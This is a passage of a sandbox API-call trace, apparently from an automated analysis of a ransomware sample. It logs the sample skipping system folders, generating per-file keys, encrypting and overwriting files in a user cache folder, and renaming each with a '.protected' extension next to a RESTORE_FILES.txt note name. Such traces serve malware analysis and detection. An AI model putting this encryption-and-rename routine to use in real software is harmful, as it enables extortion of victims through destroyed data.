(lpString1="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpString2="Program Files") returned -1 [0089.065] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpString2="Program Files (x86)") returned -1 [0089.065] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpString2="$Recycle.bin") returned 1 [0089.065] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpString2="System Volume Information") returned -1 [0089.065] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned 152 [0089.065] StrStrIW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpSrch=".protected") returned 0x0 [0089.065] lstrcmpW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpString2="RESTORE_FILES.txt") returned -1 [0089.065] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.065] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.065] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.065] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned 152 [0089.065] StrStrW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpSrch=".txt") returned 0x0 [0089.065] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned 152 [0089.065] StrStrW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpSrch=".rar") returned 0x0 [0089.065] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned 152 [0089.065] StrStrW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpSrch=".zip") returned 0x0 [0089.065] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x188, lpOverlapped=0x0) returned 1 [0089.066] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe78, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.066] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x188, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x188, lpOverlapped=0x0) returned 1 [0089.066] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.066] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.066] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.067] CloseHandle (hObject=0x150) returned 1 [0089.067] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F.protected") returned 162 [0089.067] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f.protected")) returned 1 [0089.067] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.067] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpString2="Windows") returned -1 [0089.067] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpString2="Program Files") returned -1 [0089.067] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpString2="Program Files (x86)") returned -1 [0089.067] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpString2="$Recycle.bin") returned 1 [0089.067] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpString2="System Volume Information") returned -1 [0089.067] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned 152 [0089.067] StrStrIW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpSrch=".protected") returned 0x0 [0089.067] lstrcmpW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpString2="RESTORE_FILES.txt") returned -1 [0089.067] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.067] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.068] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.068] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned 152 [0089.068] StrStrW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpSrch=".txt") returned 0x0 [0089.068] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned 152 [0089.068] StrStrW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpSrch=".rar") returned 0x0 [0089.068] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned 152 [0089.068] StrStrW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpSrch=".zip") returned 0x0 [0089.068] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x188, lpOverlapped=0x0) returned 1 [0089.069] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe78, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.069] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x188, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x188, lpOverlapped=0x0) returned 1 [0089.069] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.069] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.069] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.069] CloseHandle (hObject=0x150) returned 1 [0089.069] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416.protected") returned 162 [0089.069] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416.protected")) returned 1 [0089.070] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.070] lstrcmpiW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2="Windows") returned -1 [0089.070] lstrcmpiW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2="Program Files") returned -1 [0089.070] lstrcmpiW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2="Program Files (x86)") returned -1 [0089.070] lstrcmpiW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2="$Recycle.bin") returned 1 [0089.070] lstrcmpiW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2="System Volume Information") returned -1 [0089.070] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned 152 [0089.070] StrStrIW (lpFirst="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpSrch=".protected") returned 0x0 [0089.070] lstrcmpW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2="RESTORE_FILES.txt") returned -1 [0089.070] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.070] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.071] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned 152 [0089.071] StrStrW (lpFirst="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpSrch=".txt") returned 0x0 [0089.071] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned 152 [0089.071] StrStrW (lpFirst="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpSrch=".rar") returned 0x0 [0089.071] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned 152 [0089.071] StrStrW (lpFirst="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpSrch=".zip") returned 0x0 [0089.071] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x196, lpOverlapped=0x0) returned 1 [0089.072] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe6a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.072] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x196, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x196, lpOverlapped=0x0) returned 1 [0089.072] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.072] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.072] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.072] CloseHandle (hObject=0x150) returned 1 [0089.072] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61.protected") returned 162 [0089.073] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61.protected")) returned 1 [0089.073] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.073] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="Windows") returned -1 [0089.073] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="Program Files") returned -1 [0089.073] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="Program Files (x86)") returned -1 [0089.073] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="$Recycle.bin") returned 1 [0089.073] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="System Volume Information") returned -1 [0089.073] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned 119 [0089.073] StrStrIW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".protected") returned 0x0 [0089.073] lstrcmpW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="RESTORE_FILES.txt") returned -1 [0089.073] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.073] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.073] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.074] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned 119 [0089.074] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".txt") returned 0x0 [0089.074] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned 119 [0089.074] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".rar") returned 0x0 [0089.074] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned 119 [0089.074] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".zip") returned 0x0 [0089.074] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x156, lpOverlapped=0x0) returned 1 [0089.074] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffeaa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.075] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x156, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x156, lpOverlapped=0x0) returned 1 [0089.075] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.075] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.075] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.075] CloseHandle (hObject=0x150) returned 1 [0089.075] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015.protected") returned 129 [0089.075] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015.protected")) returned 1 [0089.076] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.076] lstrcmpiW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpString2="Windows") returned -1 [0089.076] lstrcmpiW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpString2="Program Files") returned -1 [0089.076] lstrcmpiW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpString2="Program Files (x86)") returned -1 [0089.076] lstrcmpiW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpString2="$Recycle.bin") returned 1 [0089.076] lstrcmpiW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpString2="System Volume Information") returned -1 [0089.076] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned 152 [0089.076] StrStrIW (lpFirst="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpSrch=".protected") returned 0x0 [0089.076] lstrcmpW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpString2="RESTORE_FILES.txt") returned -1 [0089.076] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.076] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.076] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.076] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned 152 [0089.076] StrStrW (lpFirst="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpSrch=".txt") returned 0x0 [0089.076] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 